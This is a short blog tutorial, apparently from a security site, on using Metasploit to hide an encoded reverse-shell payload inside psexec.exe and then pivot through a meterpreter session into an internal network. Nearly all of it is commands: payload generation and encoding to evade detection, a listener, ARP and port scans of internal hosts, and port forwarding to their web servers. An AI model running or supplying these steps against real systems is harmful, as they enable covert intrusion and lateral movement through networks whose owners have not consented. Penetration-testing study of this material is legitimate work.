Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /var/www/vhosts/ on line 3
pbnetworks - Computer Security Solutions
pbnetworks - Computer Security Solutions

pbnetworks - Computer Security Solutions

03/15/11 Meterpreter encoding & pivot

In this tutorial I use the Back|Track distro and metasploit to encode the psexec.exe then copy it over to a WindowsXP fully patched box.&nbsp; We can get our executable to our victim machine a number of ways and I will that for later.  I have listed the steps involved in using metasploit below and in the video.<br />
# msfpayload windows/shell/reverse_tcp LHOST=, LPORT=4444 R | msfencode -c 10 -e x86/shikata-ga_nai -x /root/psexec.exe -t exe > psexec3.exe
# msfconsole
msf> use multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set LPORT 4444
msf> set LHOST
msf> exploit
meterpreter> ipconfig                    This listed 2 different network interfaces &
meterpreter> run arp_scanner -h   help cmd
meterpreter> run arp_scanner -r
meterpreter> background
msf> route add 1      Now this 1 is specific to the meterpreter session
msf> route print
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS,      We got these ips fro the arp scan we did earlier
msf> set PORTS 1-200                                           You can set this to what you like but it will take time
msf> run                                                                Now you have a list of open ports that you can exploit
msf> back
msf> sessions -i 1
meterpreter> portfwd add -l 8000 -p 80 -r
meterpreter> portfwd add -l 8080 -p 80 -r
open firefox &

Now we have been able to view 2 systems that are internal to a network using the pivoting of the meterpreter payload.  The scan we did went through > > &  We then used the portfwd command to display the internal web page locally over SSL.

Return to Home
Copyright © 2019 pbnetworks. All Rights Reserved. ip information